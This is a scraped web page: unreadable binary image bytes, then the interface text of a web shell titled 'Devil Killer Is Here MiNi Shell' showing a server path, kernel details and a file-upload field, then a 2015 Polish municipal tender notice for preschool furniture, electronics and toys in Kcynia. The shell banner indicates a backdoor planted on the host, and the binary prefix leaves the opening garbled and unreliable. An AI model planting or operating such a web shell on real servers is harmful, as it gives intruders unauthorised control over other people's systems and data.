JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150903/130549-N-2015.html

<p class="kh_header"><b>Kcynia: Likwidacja barier w dostępie do edukacji przedszkolnej poprzez modernizację i doposażenie oddziałów przedszkolnych na terenie gminy Kcynia</b><br>
<b>Numer ogłoszenia: 130549 - 2015; data zamieszczenia: 03.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kcynia , ul. Rynek 23, 89-240 Kcynia, woj. kujawsko-pomorskie, tel. 52 5893720 lub 21, faks 52 5893722.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kcynia.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Likwidacja barier w dostępie do edukacji przedszkolnej poprzez modernizację i doposażenie oddziałów przedszkolnych na terenie gminy Kcynia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Likwidacja barier w dostępie do edukacji przedszkolnej poprzez modernizację i doposażenie oddziałów przedszkolnych na terenie gminy Kcynia.
Na przedmiot zamówienia składają się:
1. Odkurzacz szczotkowy praca na sucho - szt. 8
Klasyfikacja pyłów: L (low)
Moc odkurzacza [W]: min. 1000-1400
Pojemność zbiornika [l]: min. 5
Przeznaczenie odkurzacza: dywany i wykładziny
Wydatek powietrza odkurzacza [l/s]: poniżej 75
Podciśnienie odkurzacza [kPa]: 20,1-23
Funkcje odkurzacza: praca na sucho, szczotkowy
Zasilanie: elektryczne min. 230V
WYPOSAŻENIE: Ssawka szczelinowa; Ssawka do tapicerki; Odłączana rura ssąca; Rozciągliwy wąż ssący; Wskaźnik napełnienia filtra; Regulowana wysokość uchwytu; Szczotka walcowa 1 szt.
2. Szafki wysokie - szt. 15 
Szafa wysoka, jasna płyta w odcieniu brzozy z trwałym obrzeżem PCV z radosnymi, żywymi kolorami, szuflady z systemem zabezpieczającym przed wypadaniem. Szafa wyposażona w  min. 8 szuflad w dolnej części, następnie otwarta półka, nad nią część zamykana na 2 pary drzwiczek. Wym. min. 94x45x189
(kolory frontów: żywe, radosne, energetyzujące)
3. Regał z możliwością regulowania wysokości półek - szt. 5 
Regał z możliwością regulowania wysokości półek min. 48 x 45 x 189 cm wykonana z jasnej płyty w odcieniu brzozy
4. Szafka z półkami do regulowania wysokości półek wraz z drzwiczkami - szt. 10
Wymiary min. 94x45x90 cm, regulowana wysokość półek; liczba półek min. sztuk 2, drzwiczki, wykonana z jasnej płyty w odcieniu brzozy
(kolory frontów: żywe, radosne, energetyzujące)
5. Szafka wisząca z drzwiczkami - szt. 10
Szafka wisząca wykonana z jasnej płyty w odcieniu brzozy, drzwiczki do szafki wiszącej 2 sztuki, liczba półek - 2 sztuki. Wym. min. 94 x 35 x 40 cm
(kolory frontów: żywe, radosne, energetyzujące)
6. Słupek z szufladami - szt. 5
Słupek z 4 szufladami  w części dolnej, następnie otwarta półka, u góry szafka zamykana 1 drzwiczkami. Wykonany z jasnej płyty w odcieniu brzozy.
wym. min. 50 x 45 x 189 cm
(kolory frontów: żywe, radosne, energetyzujące)
7. Aplikacje na ścianę - szt. 55
Edukacyjne aplikacje na ścianę w łącznej ilości 55 sztuk (5 różnych rodzajów po 11 sztuk) np.: 
- 11 sztuk aplikacji smok wym. min. 75x90 cm - z płyty mdf  
- 11 sztuk aplikacji wróżka wym. min. 75 x 147 cm - z płyty mdf, 
- 11 sztuk aplikacji drzewo wym. min. 60 x 100 cm, z płyty mdf, 
- 11 sztuk aplikacji żyrafa wym. min. 54 x 110 cm, z płyty mdf, 
- 11 sztuk aplikacji słoń, wym min. 88 x 70 cm, z płyty mdf 
wykonane z płyty mdf z dodatkami typu materiał, guziki, różne faktury; do zamocowania na ścianę 
8. Stolik przedszkolny prostokątny z regulowaną wysokością nóżek - szt. 52 
Blat stolika wykonany z płyty laminowanej o gr. min. 18 mm. Narożniki łagodnie zaokrąglone i wykończone obrzeżem PCV o gr. 2 mm. Nogi okrągłe z regulowaną wysokością. Możliwość regulacji wysokości do 4 wymiarów w zakresie od 40 do ok. 60 cm. Wym. stolika min. 120 x 74 cm. Kolory blatów: 20 sztuk czerwony, 20 sztuk żółty, 12 sztuk zielony (lub inne: żywe, radosne, energetyzujące)
9. Stolik kwadratowy z regulowaną wysokością nóżek - szt. 6 
Blaty wykonane  z płyty laminowanej o gr. 18 mm. Narożniki łagodnie zaokrąglone i wykończone obrzeżem PCV o gr. 2 mm. Nogi okrągłe z regulowaną wysokością. Możliwość regulacji wysokości do 4 wymiarów w zakresie od 40 do min. 58 cm. Wym. stolika min. 74 x 74 cm, 
(kolory blatu: żywe, radosne, energetyzujące)
10. Stolik dziecięce sześciokątne - szt. 15
Blaty stołów wykonane z płyty laminowanej o gr. 18 mm w tonacji buku, wykończone kolorowym obrzeżem PCV o gr. 2 mm. Dł. boku 72 cm, dł. przekątnej 128 cm, 
(kolory obrzeży: żywe, radosne, energetyzujące); 
nogi okrągłe z możliwością regulowania wysokości stolika do 4 wymiarów w zakresie od 40 do min. 58 cm.
11. Krzesełko dziecięce - szt. 241 
Krzesło z siedziskiem i oparciem wykonanym z lakierowanej sklejki bukowej. Stelaż wykonany z profilu kwadratowego o przekroju min. 20 x 20mm, oparcie lekko wygięte.
Nóżki z zatyczkami z tworzywa które chronią podłogę przed zarysowaniem
Sklejka grubości 6 mm.
Różne wysokości siedziska:
- 75 sztuk z wysokością min. 31 cm;
- 75 sztuk z wysokością min. 35 cm; 
- 91 sztuk z wysokością min, 38 cm.
W sumie 241 sztuk krzesełek.
12. Biurko dla nauczyciela z 2 szafkami i szufladą - szt. 11
Biurko wykonane z płyty laminowanej o gr. 18 mm w tonacji buku, wykończone obrzeżem o gr. 2 mm. Wyposażone w dwie szafki po lewej stronie jedna i po prawej stronie jedna, na środku natomiast szuflada. Wszystkie elementy tj. szafki i szuflady zamykane na zamek.
Wym. min. 130 x 60 x 76 cm
13. Krzesło dla nauczyciela - krzesło biurkowe obrotowe - szt. 11
Ergonomiczne krzesło obrotowe z profilowanym oparciem i siedziskiem, a także podłokietnikami o regulowanej wysokości. Płynna regulacja wysokości siedziska za pomocą podnośnika pneumatycznego.
Materiał 100 % włókno syntetyczne. Kolor czarny
14. Kolorowa biblioteczka - szt. 18
Biblioteczki z 3 poziomami półeczek, do eksponowania książek. Wykonane z płyty wiórowej w tonacji buku, z kolorowymi elementami z płyty mdf.
2 pojemniki w części dolnej zwiększające powierzchnię do przechowywania gier i książek. Pojemniki w kolorach żywych, radosnych, energetyzujących.  
- wym. min. 73 x 40 x 121 cm
15. Dywan kolorowy 3 x 4 m - szt. 3
Dywan edukacyjny, kolorowy np. w biedronki z liczbami od 1 do 10. 
100% PP heat - set frise przędza pojedyncza, posiadać powinien certyfikat zgodności tzw. atest higieniczny,  wymiary dywanu w przedziale od 3,0 do 5,0 m
16. Półka wisząca - szt. 2
Półka dwupoziomowa do zawieszania na ścianie wykonana z płyty wiórowej w tonacji brzozy z elementami w kolorach żywych, radosnych, energetyzujących z płyty MDF. Wymiary min. 100 x 25 x 50 cm
17. Szafka na zabawki - szt. 35
Szafka z płyty w tonacji brzozy. 
Na froncie szafki trójwymiarowe motywy kolorowych misiów lub innych postaci, pozwalające dzieciom na poznawanie nowych faktur. Fronty szafek wykonane z lakierowanej płyty MDF w kolorach żywych, radosnych, energetyzujących, natomiast skrzynie z laminowanej płyty w tonacji brzozy.
Szafka zamykana wym. min. 95 x 40 x 80 cm (+ cokół o wys. 6,7 cm) + 1 półka
18. Regał otwarty na zabawki - szt. 7
Regał otwarty z płyty w tonacji brzozy,  wym. min. 50 x 40 x 160 cm (+ cokół o wys. 6,7 cm), 4 półki
19. Komoda - szt. 7
Komoda o wym. min. 75 x 40 x 80 cm z 2 półkami  (+ cokół o wys. ok. 7 cm, aplikacja z tyłu komody o wys. ok. 14 cm przedstawiająca np. pszczółki lub inne równoważne ozdoby) w kolorach żywych, radosnych, energetyzujących.
20. Szafka na pojemniki wraz z pojemnikami  wysoka - szt. 7 
Szafka na plastikowe pojemniki na kółkach. Wykonana z płyty laminowanej o gr. 18 mm, w tonacji brzozy, z obrzeżem ABS. Wym. min. 70 x 48 x 78 cm. 
Pojemniki do szafki: 4 sztuki duże o wymiarach 31,2 cm x 43 cm x 22,5 cm; w kolorach żywych, radosnych, energetyzujących / 8 sztuk małych o wymiarach 31,2 cm x 43,0 cm x 7,5 cm, w kolorach żywych, radosnych, energetyzujących.
Pojemniki wykonane z wytrzymałego tworzywa sztucznego pasujące do szafek. Pojemniki dostarczane z prowadnicami.
21. Szafka na pojemniki wraz z pojemnikami  niska - szt. 7
Szafka na plastikowe pojemniki na kółkach. Wykonana z płyty laminowanej o gr. 18 mm, w tonacji brzozy, z obrzeżem ABS. Wym. min. 70 x 48 x 48 cm. Pojemniki do szafki: - 2 szt. duże o wymiarach 31,2 cm x 43 cm x 22,5 cm; w kolorach żywych, radosnych, energetyzujących / 4 szt. małe o wymiarach 31,2 cm x 43,0 cm x 7,5 cm, w kolorach żywych, radosnych, energetyzujących.
Pojemniki wykonane z wytrzymałego tworzywa sztucznego pasujące do szafek. Pojemniki dostarczane z prowadnicami. 
22. Pufa z miękkim pokrowcem w kształcie zwierzątka - szt. 204 
Pufa wysokości ok. 30 cm w łącznej ilości 204 sztuki (6 różnych rodzajów) w tym: 
- 30 sztuk pufy kotek; 
- 30 sztuk pufy baranek; 
- 30 sztuk pufy piesek;
- 30 sztuk pufy tygrysek; 
- 30 sztuk pufy biedronka;
- 54 sztuki pufy typu żółwik 
Każda pufa składa się z miękkiej poduchy z bawełnianym pokrowcem, który można prać w pralce. Wypełnienie z pianki, śr. Min. 35 cm, wys. min. 30 cm
23. Szafka na odzież i obuwie z modułami dla 5 dzieci - szt. 29 
Szafka do szatni z modułami dla 5-ki dzieci, wykonana z płyty wiórowej w tonacji klonu o gr. 18 mm. Posiadająca półeczkę, miejsce na naklejenie znaczka oraz przegródki z haczykami na ubrania i worki. 5 modułów z drzwiczkami w kolorach: żywych, radosnych, energetyzujących (każdy inny). Wnęka każdego z modułów po zamontowaniu drzwiczek o gł. 25 cm. Wym. min. 108 x 50 x 130 cm.  Kolorowe drzwiczki wykonane z płyty MDF.
24. Szafka na odzież i obuwie z modułami dla 6 dzieci - szt. 18 
Szafka do szatni z metalowym stelażem przeznaczona dla 6-ki dzieci. Na górze półka na czapki, na dole ławeczka do siedzenia - wykonane z płyty laminowanej. Pod ławką metalowe pręty na buty. Stelaż w kolorach żywych, radosnych, energetyzujących. Z tyłu aplikacja np. w  kształcie chmury w kolorach żywych, radosnych, energetyzujących z płyty MDF.
Wym. min. 135 x 42 x 130 cm
25. Szafka na odzież i obuwie z modułami dla 3 dzieci - szt. 5 
Szafka do szatni z metalowym stelażem przeznaczona dla 3-ki dzieci. Na górze półka na czapki, na dole ławeczka do siedzenia - wykonane z płyty laminowanej. Pod ławką metalowe pręty na buty. Stelaż w kolorach żywych, radosnych, energetyzujących. Z tyłu aplikacja np. w kształcie chmury w kolorach żywych, radosnych, energetyzujących z płyty MDF.
Wym. min. 68 x 42 x 130 cm
26. Ławeczki do szatni - szt. 3 
Wykonana z płyty wiórowej w tonacji buk.
Wymiary min. 130 x 42 x 34 cm
27. Szafa z półeczkami i wieszakami na odzież - szt. 1
Szafa ubraniowa z płyty laminowanej w tonacji klonu.
Drzwi dwuskrzydłowe. W lewej części znajdują się 3 półki, w prawej drążek na ubrania. Szafa o wymiarach min. 104 x 45 x 170 cm. Drzwiczki malowane obustronnie w kolorach żywych, radosnych, energetyzujących.
28. Regał metalowy z 4 półkami - szt. 2
Regał metalowy z 4 półkami w kolorach żywych, radosnych, energetyzujących. Perforacja słupków nośnych umożliwia dowolną regulację odstępów między półkami. Maksymalne obciążenie półki wynosi 40 kg.
Wym. min. 85 x 40 x 170 cm
29. Telewizor 50 cali - szt. 12
50 calowy telewizor wyposażony w tuner telewizji cyfrowej naziemnej oraz satelitarnej. Podstawowe, min. parametry / cechy / funkcje:
Procesor do funkcji smart
LED, smart TV, 3D
Przekątna ekranu [cale / cm]: 50 / 126,5
Format obrazu: 16:9, 4:3
Format HD: Full HD
Rozdzielczość: 1920 x 1080
Optymalizacja obrazu: 800 Hz
Jasność [cd/m2]: 400
4 złączą HDMI, 2 złącza USB, wejście słuchawkowe
Uchwyt dedykowany do telewizora, umożliwiający jego montaż na ścianie
Gwarancja 24 miesiące
30. Odtwarzacz DVD - szt. 12; Rodzaj odtwarzanych płyt: Audio CD, CD, CD-R, CD-RW, CD-text, DVD, DVD Text, DVD+R, DVD+R DL, DVD+RW, DVD-R, DVD-RW, DVD-Video, SVCD, VCD; Obsługiwane formaty plików: AAC, HD JPEG, JPEG, LPCM, MP3, MPEG-1, MPEG-4, WMA; System telewizyjny: NTSC/PAL; Przetwornik C/A wideo: 108 MHz/12 bit; Inne: cyfrowe wyjście audio 96 kHz/24 bity, Cyfrowe wyjście audio DTS; Złącza HDMI i USB; Gwarancja 24 miesiące
31. Radio z odtwarzaczem CD i MP3 - szt. 12 
Odtwarzanie płyt CD, CD-R, CD-RW, CD-MP3 oraz CD-WMA, 
Tuner FM/MW, złącze MP3 Link, dynamiczne wzmocnienie basów (DBB), 2 głośniki, wejście na słuchawki, minimalna liczba utworów do zaprogramowania w formacie CD - 20, Typ wyświetlacza: LCD, zegar, kolor czarny lub srebrny, zasilanie baterie/sieć, port USB.
Gwarancja 24 miesiące
32. Aparat fotograficzny cyfrowy - szt. 12 
Kolor czarny, wyposażenie:  Akumulator jonowo-litowy, Ładowarka, Pasek, Kabel AC, Kabel interfejsu, 
Minimum - 12 mln pikseli rozdzielczość,
Maksymalna przysłona - f/3.5 - f/6.8
Ogniskowa min. (ekw. dla 35mm) - 25
Ogniskowa maks. (ekw. dla 35 mm) - 500
Zoom optyczny - minimum x20
Zoom cyfrowy - minimum x4
Ustawienie ostrości - Automatyczne
Minimalna odległość (makro) [cm] - 5
Nośnik danych - Karta pamięci SD Info, Karta pamięci SDXC Info, Karta pamięci SDHC Info
Format zapisu zdjęć - JPEG
Rozdzielczość zdjęć - 4000 x 3000, 2816 x 2112, 1600 x 1200, 640 x 480, 4000 x 2248, 2816 x 1584, 1920 x 1080, 640 x 360, 4000 x 2664, 2816 x 1880, 1600 × 1064, 640 x 424, 2992 x 2992, 2112 x 2112, 1200 x 1200, 480 x 480
Nagrywanie filmów - MP4
Rozdzielczość filmów - 1920 x 1080, 1280 x 720, 640 x 480
Nagrywanie dźwięku - Stereofoniczne
33. Tablica interaktywna wraz z projektorem i uchwytem - szt. 12 
Siła światła: min. 2500 Ansi Lumenów
Rozdzielczość natywna: XGA (1024x768)
Kontrast: min. 3000:1
Technologii: LCD
Lampa: 4000 godzin
Obraz 80 cali odległość od ekranu - 0,86 m
Przyłącze instalacyjne ATBUS wraz z okablowaniem
Wymiary tablicy: min. 160,5 (szer.) × 127,2 (wys.) × 12,8 (gł.) cm
Technologia: optyczna
Efektywna powierzchnia ekranu: min. 77 cale (195.6 cm)
Rodzaj powierzchni: suchościeralna
Metoda transmisji obrazu: przewodowo
Interface (z przewodem / bezprzewodowy):  USB 2.0
System operacyjny min.:  Apple MacOS X 10.3.x, Microsoft Windows 2000, Microsoft Windows 98, Microsoft Windows NT, Microsoft Windows XP lub nowszy
Oprogramowanie:  StarBoard Software, 1 set
Gwarancja: 24 miesiące
ZESTAW składać się powinien z: Tablicy, Projektora, Uchwytu do projektora
34. Zabawki - 12 kompletów
W skład kompletu wchodzą:
a)	Klocki typu wesołe miasteczko lub równoważne - 3 kompletów 
Wykonane z drewna kauczukowego i brzozowego, minimum 88 elem. 
b)	Klocki typu Leśne miasteczko lub równoważne - 3 komplety 
Wykonane z drewna brzozowego. minimum 126 elem.
c)	Kolorowe drewniane klocki lub równoważne - 3 komplety 
Minimum 100 drewnianych klocków o różnych kształtach
d)	klocki wafle konstrukcyjno standardowe  - 4 zestawy 
e)	Wywrotka - 4 szt.
Różne kolory. 
Wys. min. 65 cm - dł. min. 40 cm
f)	Ciężarówka z autami - 4 sztuki
g)	Mata imitująca miasto - 2 szt.
Wykonana z dobrej jakości tkaniny odpornej na zniszczenia. Motywy na zielonej macie powinny zawierać m.in. budynki, ulice, drzewa. - wym. min. 140 x 70 x 0,5 cm
h)	Garaż pozimowy - 2 szt.
garaż poziomowy długość torów zjazdowych min. 3,0 m  (3-poziomowy garaż z windą oraz myjnią, min. 2 autka, stacja benzynowa, stanowisko diagnostyczne oraz 3 metry drogi). 
wym. po rozłożeniu min. 80 x 90 x 36 cm;
i)	Lalka- 3 szt.
Z akcesoriami do kąpieli, 
dł. lalki min. 27 cm
j)	Lalka szmaciana 46 cm - 3 szt.
k)	Lalka szmaciana 61 cm - 3 szt.
l)	wózek dla lalek z gondolą - 2 szt.
m)	Duża kuchnia dla dzieci z akcesoriami do gotowania - 1 szt.
Kuchenka wykonana z tworzywa sztucznego. Zestaw zawierający różne akcesoria kuchenne. Działający na baterie. 
Akcesoria takie jak, m.in.
- patelnia
- pokrywka
- czajnik
- łyżka
- nóż
- widelec
- talerze
-kubki
- musztarda
- keczup
- mleko
- sałata
wys. kuchni min. 72 cm
n)	zestaw akcesoria kuchenne plastikowe - 3 komplety 
o)	zestaw produkty spożywcze min. 101 drobiazgów różnych  - 1 komplet 
p)	Kasa sklepowa ze skanerem- 2 szt.
Wykonana z tworzywa sztucznego, z działającym kalkulatorem i świecącym na czerwono skanerem. Działajaca na baterie. 
W skład wchodzą m.in.:
- koszyczek na zakupy
- sałata
- ketchup
- sok owocowy
- monety
- banknoty
- karta płatnicza
- wym. min. 35 x 17,5 x 15 cm
q)	Straż pożarna - 3 szt.
Wykonana jest z lekkiego, wytrzymałego tworzywa sztucznego, 
r)	Betoniarka - 6 szt.
Duża i bezpieczna zabawka wykonana z tworzywa sztucznego, obracający się bęben, długość min. 38 cm
s)	Koparka - 6 szt.
Duża i bezpieczna zabawka wykonana z tworzywa sztucznego, długość min. 38 cm
t)	Puzzle drewniane 16 elementów - 10 zestawów 
u)	Puzzle drewniane 6 elementów - 10 zestawów 
v)	Piłka do skakania 65 cm lub równoważne - 5 szt.
Piłka do skakania w kolorze np. żółtym, posiada wygodne uchwyty. - śr. min. 65 cm
w)	Piłka do skakania 55 cm lub równoważne - 6  szt.
Wytrzymująca 150 kg nacisku przy skakaniu. Posiadająca stabilne uchwyty do trzymania. Min. śr. 55 cm, kolor np. żółty 
x)	kolejka i tory - 2 zestawy 
Zestaw zawierać powinien m.in. 60 elementów: długi kręty tor z drewna, odlaną z tworzywa górę z tunelem, ludziki, konie, kurczaki, świnki, krowy, młyn, stajnia, obora pozwalają na uatrakcyjnienie trasy pociągu. wym. po złożeniu min. 120 x 80 cm
35. Artykuły plastyczne - 12 kompletów
W skład kompletu wchodzą:
a)	brystol 100 arkuszy o wymiarach 70 x 50 cm w 25 kolorach, 300 g/m kw - 5 zestawów; 
b)	Brystol mix A3/100 ark w 10 kolorach - 5 zestawów; 
c)	Kolorowanki z naklejkami różne rodzaje - 30 szt.
d)	Kredki typu pastele olejne w 24 kolorach - 10 zestawów
e)	kredki świecowe - 1 zestaw
w skład zestawu wchodzi min. 300 sztuk kredek w 12 kolorach;
f)	bibuła - 5 zestawów
mix kolorów. Każdy zestaw składający się z 15 rolek bibuły karbowanej o wym. min. 200 x 50 cm; 
g)	Plastelina w 12 kolorach - 10 zestawów (po180 sztuk) 
Plastelina w 12 kolorach x 15 sztuk każdego koloru w opakowaniu (razem 180 szt. w opakowaniu/zestawie)
h)	Tempery 1000 ml lub równoważne - 40 szt.
Mix różnych kolorów. Farby na bazie wody, dzięki czemu łatwo zmywają się z rąk i ubrania.
Pojemność jednej butelki min. 1000 ml
36. Pomoce dydaktyczne - 12 kompletów
W skład 1 kompletu wchodzą:
a)	1 sztuka płyty CD zawierająca minimum 10 bajek; 
b)	Książka z ćwiczeniami typu Uczmy się słówek - 25 sztuk 
Zawierająca min. 400 kart ze zdjęciami do kserowania i wycięcia. Tematyka ćwiczeń różnorodna: kolory, ubrania, żywność, meble, przedmioty codziennego użytku, przeciwieństwa, ludzie, zabawki, rodzina, uczucia, artykuły szkolne, zawody i inne; gry planszowe, puzzle z numerami itp.  
c)	karty do nauki języka angielskiego typu skojarzenia lub podobne - 5 zestawów 
Karty przedstawiające przedmioty z najbliższego otoczenia dziecka. Każda ilustracja powinna mieć nazwę po angielsku. W skład zestawu wchodzić powinno min. 20 plastikowych kart 
d)	Gra memory typu Flagi lub inna równoważna - 3 szt.
Gra zawierać powinna min. 80 kartoników przedstawiających min. 40 flag państw świata
e)	Gra typu Unia Europejska lub inna równoważna - 2 szt.
Zawartość pudełka m.in.: plansza, kostka, instrukcja, 
f)	Plansze typu 4 sezonowe drzewa lub inne równoważne - 1 zestaw
Zestaw zawiera 4 ciekawe plansze z różnymi porami roku,
g)	Gra polegająca na nauce sortowania i recyclingu kosze na odpady lub równoważna - 2 sztuki 
Gra planszowa mająca na celu przybliżenie dzieciom problematyki ochrony środowiska - sortowania odpadów. Plansza o wym. min. 39 x 39 cm i 4 >>ciężarówki<< - min. 20 pojemników do sortowania.
h)	Magnetyczne plansze typu Bawimy się liczbami lub równoważne - 6 zestawów 
Pomoc edukacyjna do nauki liczenia w zakresie od 1 do 10. Każdy zestaw zawierający: min. 12 magnetycznych kart o wym. 25 x 5 cm, min. 60 magnetycznych żetonów oraz instrukcję, 
i)	Liczydło stojące lub podobne równoważne - 3 szt.
Drewniane liczydło stojące. Koraliki w 2 różnych kolorach: np. w żółtym i czerwonym. - wym. minimum 85 x 120 cm
j)	Mapa Polski dla najmłodszych lub równoważne - szt. 1
Makatka przedstawiająca mapę Polski przybliżająca pojęcia geografii: morze, jeziora, rzeki, góry itd. Nazwy miast i charakterystyczne elementy przyczepiane powinny być na rzepy, co daje możliwość licznych ćwiczeń, wym. min. 80 x 80 cm.
k)	Zestaw zdjęć typu umiejętności lub inny równoważny - 2 zestawy 
W skład zestawu wchodzi min. 200 zdjęć niezbędnych do ćwiczeń językowych. Zestaw zawierający fotografie m. in. przedmiotów i zwierząt do układania w pary, klasyfikowania, sortowania itp.
UWAGA:
1)	Wszystkie wymiary mebli i zabawek podane w tabeli są orientacyjne. Jeżeli nie zostały określone jako minimalne / maksymalne, Zamawiający dopuszcza tolerancję ? 5 - 10%, w przeciwnym wypadku tolerancja dot. tylko jednej strony (dla min.: plus 5 - 10% / dla max.: minus 5 - 10%).
2)	Wszystkie parametry sprzętu RTV/AGD są minimalnymi wymaganymi. Dopuszczalne jest zaoferowanie sprzętu o parametrach lepszych (np. wyższa rozdzielczość, większa ilość złączy, dodatkowe formaty plików / codeców). Sprzęt o niektórych parametrach lepszych, ale niespełniający wymogów minimalnych będzie uważany za niezgodny z SIWZ, a oferta Wykonawcy zostanie odrzucona.
